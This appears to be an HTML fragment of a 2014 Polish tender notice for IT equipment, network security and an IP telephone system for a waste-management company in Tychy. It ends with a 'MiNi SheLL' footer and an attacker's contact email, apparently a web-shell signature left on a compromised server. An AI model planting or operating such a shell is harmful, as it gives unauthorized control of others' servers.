<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Wdrożenie dostarczonej infrastruktury zostanie przeprowadzone przez osoby posiadające stosowne certyfikaty i uprawnienia:
a. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji technologii wirtualizacji zaoferowanego rozwiązania,
b. Co najmniej jeden ważny certyfikat z zakresu znajomości rodziny serwerowych systemów operacyjnych
oferowanego producenta.
c. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji systemu bezpieczeństwa zaoferowanego rozwiązania

Wymagane jest dołączenie do oferty kopii wyżej wymienionych dokumentów potwierdzonych za zgodność z oryginałem. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia /nie spełnia, na podstawie złożonych dokumentów.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- w przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy; Zamawiający dopuszcza możliwości zwiększenia wartości przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.master.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzygminne Przedsiębiorstwo Gospodarki Odpadami i Energetyki Odnawialnej Master Sp. z o.o. w Tychach przy ul. Grota Roweckiego 44 lub za pośrednictwem Poczty Polskiej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 10:00, miejsce: Międzygminne Przedsiębiorstwo Gospodarki Odpadami i Energetyki Odnawialnej Master Sp. z o.o. w Tychach przy ul. Grota Roweckiego 44 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kompleksowego Zagospodarowania Odpadów Komunalnych w Tychach realizowanego w ramach Projektu POIS.02.01.00-00-016/09 Budowa Międzygminnego Zakładu Kompleksowego Zagospodarowania Odpadów Komunalnych w Tychach w ramach działania 2.1 - Kompleksowe przedsięwzięcia z zakresu gospodarki odpadami komunalnymi ze szczególnym uwzględnieniem odpadów niebezpiecznych priorytetu II - Gospodarka odpadami i ochrona powierzchni ziemi. W ramach  Funduszu Spójności - Program Operacyjny Infrastruktura i Środowisko 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa komputerów, dostawę i montaż serwerów i infrastruktury sieciowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część zamówienia:

 Przedmiotem zamówienia jest dostawa fabrycznie nowych komputerów:
A. Komputer przenośny 15,6
 Dostawa, ilość: 5 sztuk
B. Stacja Dokująca 
Dostawa, ilość: 3 sztuki
C. Komputer przenośny 14
Dostawa, ilość: 3 sztuki
D. Stacja Dokująca 
Dostawa, ilość: 3 sztuki
E. Jednostka centralna - komputer stacjonarny  
Dostawa ilość: 2 sztuki
F. Monitor 21 - 23
Dostawa, ilość: 4 sztuki
G. Oprogramowanie - pakiet biurowy
Dostawa, ilość: 10 sztuk
H. Oprogramowanie - serwerowy system operacyjny
Dostawa i instalacja, ilość: 2 sztuki
	
I. Oprogramowanie - serwerowe licencje dostępowe 
Dostawa i instalacja, ilość: 50 sztuk
J. Oprogramowanie - system do wirtualizacji 
Dostawa i instalacja, ilość: 1 sztuka

K. Serwer  
Dostawa i montaż, ilość: 2 sztuki
L. Macierz dyskowa
Dostawa i montaż,  ilość: 1 sztuka
M. Przełącznik KVM i konsola
Dostawa i montaż,  ilość: 1 sztuka
N. Przełącznik rdzeniowy 
Dostawa i montaż, ilość: 1 sztuka
O. Przełącznik dostępowy  
Dostawa i montaż, ilość: 2 sztuki
P. Rozwiązanie typu Firewall działające w klastrze
Dostawa i montaż, ilość: 1 zestaw
R. Szafa krosowa
Dostawa i montaż, ilość: 1 sztuka
S. Listwa zasilająca
Dostawa i montaż, ilość: 2 sztuki

T. Patch panel
Dostawa i montaż ilość: 3 sztuki
U. Organizer kabli 
Dostawa i montaż ilość: 4 sztuki
W. Zasilacz awaryjny - UPS 
Dostawa i montaż ilość: 1 sztuka 
U. Kable krosowe
Dostawa i montaż, ilości:

50 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 2mb 
50 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 1mb
24 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 0,5mb
Opis dostawy i montażu

1.Wdrożenie dostarczonej infrastruktury zostanie przeprowadzone przez osoby posiadające stosowne certyfikaty i uprawnienia:
a. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji technologii wirtualizacji zaoferowanego rozwiązania,
b. Co najmniej jeden ważny certyfikat z zakresu znajomości rodziny serwerowych systemów operacyjnych
oferowanego producenta.
c. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji systemu bezpieczeństwa zaoferowanego rozwiązania

Wymagane jest dołączenie do oferty kopii wyżej wymienionych dokumentów potwierdzonych za zgodność z oryginałem. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia, na podstawie złożonych dokumentów. 

2.W ciągu 7 dni od podpisania umowy należy dostarczyć projekt wykonawczy który ma zawierać co najmniej:

W zakresie dostarczonego systemu bezpieczeństwa
Wykonania szczegółowego audytu obecnej topologii sieci oraz użytych mechanizmów sieciowych pod kątem wybrania optymalnej topologii docelowej,
Wykonania kompleksowego audytu konfiguracji i działania obecnie posiadanych urządzeń sieciowych. W zakresie filtracji ruchu należy założyć, że obecna polityka bezpieczeństwa jest uboga i musi być zbudowana praktycznie od nowa,
Analizy utylizacji używanych obecnie łącz oraz przepływu danych w sieci pod kątem aktywnego wykorzystania przez poszczególne usługi biznesowe,
Analizy wymogów bezpieczeństwa w firmie pod kątem przyszłej polityki bezpieczeństwa włącznie z wywiadem środowiskowym w celu uzupełnienia wiedzy i analizą działania w aplikacji w celu określenia używanych portów TPC/UDP,
Przygotowania koncepcji zmian w topologii, jeśli takie będą wymagane, do osiągnięcia optymalnej pod względem szybkości działania i niezawodności topologii docelowej,
Przygotowania koncepcji wdrożenia rozwiązania pracującego w klastrze uwzględniając aspekt współpracy/integracji z sąsiednimi systemami i urządzeniami (typu przełączniki rdzeniowe, Active Directory) oraz przedstawione przez Zamawiającego wymagania. Koncepcja wdrożenia poza tradycyjnymi elementami typu reguły filtracji oraz translacji powinna obejmować: Szczegółowe wdrożenie wszystkich obsługiwanych przez firewall funkcji UTM, tunele VPN (typu IPSec oraz SSL), jak również identyfikację użytkowników z wykorzystaniem kont w Active Directory oraz inteligentne balansowanie obciążenia łącz do Internetu,
Wdrożenia rozwiązania pracującego układzie redundantnym High Availability z uwzględnieniem wszystkich przedstawionych wymagań i zaakceptowanej przez Zamawiającego koncepcji,
Wykonanie rekonfiguracji innych urządzeń i systemów w sieci w celu poprawnej współpracy z firewallami (uruchomienie agregacji portów LACP, rekonfiguracja STP, integracja z AD itp). 
Wykonanie gruntownych testów niezawodności i odporności na różne awarie i scenariusze zdarzeń (awaria dowolnego linku, urządzenia, brak zasilania, zapętlenie ruchu w switchu w dowolnej strefie, awaria jednego z firewalli, awaria dowolnego portu w firewallu, awaria jednego z łącz do Internetu),

W zakresie macierzy, serwerów, sieci LAN, szafy krosowniczej i UPS-a
Aktualizacja oprogramowania urządzeń do najnowszej wersji stabilnej, zalecanej przez producenta,
Konfiguracja wstępna z uwzględnieniem podstawowej konfiguracji środowiska zarządzania: adresacja IP, zapewnienie zdalnego dostępu do interfejsów zarządzania,
Instalacja szafy dystrybucyjnej wraz z osprzętem,
Instalacja urządzeń w szafie dystrybucyjnej, podłączenie okablowania i uruchomienie komunikacji w sieci LAN,
Konfiguracja środowiska zarządzania w szczególności: ustawienie wszystkich parametrów związanych z adresacją i routingiem IP, ograniczenie zdalnego dostępu do urządzeń, konfiguracja autentykacji użytkowników z wykorzystaniem protokołu Radius i wskazanego przez Administratora serwera autentykacji, zapewnienie możliwości zarządzania poprzez protokoły SSH i HTTPS, instalacja oprogramowania do zarządzania urządzeniami na stacjach zarządzających,
Konfiguracja wirtualnych sieci lokalnych (VLAN) i protokołów niezbędnych do automatycznej wymiany informacji o VLAN ach wraz z zabezpieczeniami na poziomie hasła,
Ustawienie filtracji ruchu za pomocą list kontrolnych ACL, zgodnie z przygotowana wcześniej polityką bezpieczeństwa. 
Konfiguracja protokołu STP (Spanning Tree Protocol) z uwzględnieniem osobnych instancji dla każdej wirtualnej sieci lokalnej VLAN lub grup VLAN ów z osobna,
Optymalizacja protokołu STP oraz czasów zbieżności sieci w przypadku awarii jednego z redundantnych linków lub wystąpienia pętli,
Zabezpieczenie urządzeń przed atakami typu MAC Flooding.
Konfiguracja zabezpieczeń protokołu DHCP przed nieautoryzowanym wpięciem serwerów DHCP,
Konfiguracja obsługi ruchu typu multicast (IGMP Snooping),
Konfiguracja Private VLAN na potrzeby sieci kopii zapasowych,
Agregacja wskazanych linków na potrzeby połączeń z serwerami (Ether Channel),
Testy poprawności konfiguracji,
Przygotowanie instrukcji wykonywania kopii konfiguracji urządzeń i odtwarzania w przypadku awarii.

W zakresie instalacji platformy wirtualizacyjnej 
Konfiguracja macierzy, wydzielenie zasobów na wirtualne serwery. 
Konfiguracja sieci LAN w infrastrukturze wirtualnej . 
Instalacja i konfiguracja platformy do zarządzania maszynami wirtualnymi. 
Konfiguracja klastra wysokiej dostępności. 
Testy wydajności, optymalizacja. 

Projekt powinien być podpisany przez osobę/by posiadającą minimum 5 letnie doświadczenie w projektowaniu i wdrażaniu podobnych rozwiązań i posiadające stosowne certyfikaty i uprawnienia jak w pkt 1. 
Złożony projekt wykonawczy będzie zatwierdzany protokołem zdawczo - odbiorczym przez zamawiającego, w terminie 7 dni od daty złożenia kompletnego projektu do zamawiającego.
Dostawa, montaż i uruchomienie przedmiotu zamówienia wykonać w ciągu 30 dni od podpisania umowy na bazie zatwierdzonego projektu wykonawczego
Po zakończeniu prac montażowych wykonawca pisemnie zgłosi gotowość do odbioru i rozruchu przedmiotu zamówienia. Po podpisaniu protokołu odbioru przez obie stronny nastąpi 30 dniowy rozruch urządzeń. 
Wraz z pisemnym zgłoszeniem gotowość do odbioru i rozruchu wykonawca ma obowiązek dostarczenia dokumentacji zawierającej opis działania systemu bezpieczeństwa wraz z opisem topologii całej sieci po wprowadzonych zmianach. Dokumentacja musi zawierać w szczególności precyzyjne rysunki całej topologii sieci w ujęciu logicznym jak i fizycznym wraz z adresacją, opisem vlanów, sposobu działania poszczególnych połączeń (LACP, 802.1Q) oraz użytych w sieci mechanizmów. Schemat połączeń winien zostać dostarczony w formie drukowanej oraz w elektronicznym formacie edytowalnym (format .VSD - Visio).
Podczas rozruchu wykonawca ma  przeprowadzić szkolenia wskazanych osób w siedzibie Zamawiającego w zakresie całej instalacji a w szczególności z administracji systemem bezpieczeństwa, zwirtualizowanym środowiskiem, macierzą i przełącznikami sieci LAN.
Po stwierdzeniu poprawności wykonania, uruchomienia i konfiguracji całego zakresu zamówienia zostanie podpisany protokół końcowy odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż nowej centrali telefonicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część zamówienia:

A. Przedmiotem zamówienia jest dostawa i montaż nowej centrali telefonicznej:
Centrala telefoniczna

Dostawa i montaż ilość: 1 sztuka 

Dostarczenie, montaż i konfiguracja centrali telefonicznej wraz z telefonami i stacjami bazowymi (wykonanie niezbędnego okablowania jest po stronie Zamawiającego). 

 
Wraz z centralą zostaną dostarczone niezbędne komercyjne i dożywotnie licencje na aplikacje wspomagające pracę centrali w zakresie:
- komunikacji
- bilingu
- rejestracji rozmów
- konfiguracji
 
Na centralę zostanie udzielona gwarancja na okres minimum 36 miesięcy z naprawą na miejscu w przeciągu 4 godzin on momentu zgłoszenia usterki.

Wraz z centralą zostaną dostarczone:
- system DECT IP z 4 bazami oraz 40 szt. telefonów DECT,
- 1 szt. telefonu IP sekretarskiego współpracującego z dostarczoną centralą z dodatkową konsolą umożliwiająca zaprogramowanie min. 30 przycisków BLF z sygnalizacją zajętości,
- 15 szt. telefonów IP podstawowych współpracujących z dostarczoną centralą z obsługą słuchawek nagłownych,
- 3 szt. słuchawek nagłownych na jedne ucho współpracujące z dostarczonymi telefonami systemowymi
- konfiguracja centrali umożliwiająca realizację połączeń ze wszystkich dostarczonych aparatów

System bezprzewodowy DECT
Bezprzewodowy system komunikacyjny
Zakres funkcjonalny systemu:
a)	Zapewnienie komunikacji wewnętrznej głosowej i dla użytkowników telefonów bezprzewodowych w obrębie zasięgu działania stacji bazowych;
b)	Zapewnienie przenoszenia aktywnych połączeń głosowych pomiędzy stacjami bazowymi (funkcja handover);
c)	Zarządzanie telefonami bezprzewodowymi przez administratora systemu obejmujące:
aktualizację oprogramowania telefonów;
włączenie/wyłączenie dostępu do menu telefonu;
wgrywanie/zmianę profilu telefonu;
przypisywanie wybranych funkcji do klawiszy funkcyjnych telefonu.
d)	Obsługa wiadomości przywoławczych/interaktywnych obejmująca:
e)	Możliwość rozbudowy o minimum 500 telefonów bezprzewodowych oraz 50 stacji bazowych;
f)	Zapewnienie wewnętrznej komunikacji dla użytkowników telefonów bezprzewodowych w przypadku niedostępności (awarii) centrali telefonicznej.
 

Telefon sekretarski:
Graficzny wyświetlacz LCD o rozdzielczości 132x64 pikseli. 
Lokalna książka telefoniczna o pamięci 1000 wpisów.
Wsparcie dla zdalnych książek telefonicznych w formacie XML/LDAP.
Przeglądarka XML
Action URL&action URI
Open VPN
Switch z 2 portami 10/100 Ethenet, zintegrowane PoE
13 programowalnych klawiszy
Możliwość rozbudowy o moduły sekretarskie (maksymalnie 6)
Możliwość podłączenia maksymalnie dwóch modułów bez dodatkowego zasilacza
Możliwość monitorowania 238 linii przy wykorzystaniu modułów (BLF)
Telefon podstawowy:
Graficzny wyświetlacz LCD o rozdzielczości 132x64 pikseli. 
Lokalna książka telefoniczna o pamięci 1000 wpisów.
Wsparcie dla zdalnych książek telefonicznych w formacie XML/LDAP.
Przeglądarka XML
Action URL&action URI
Switch z 2 portami 10/100 Ethenet, zintegrowane PoE
Open VPN
Możliwość montażu naściennego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.55.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com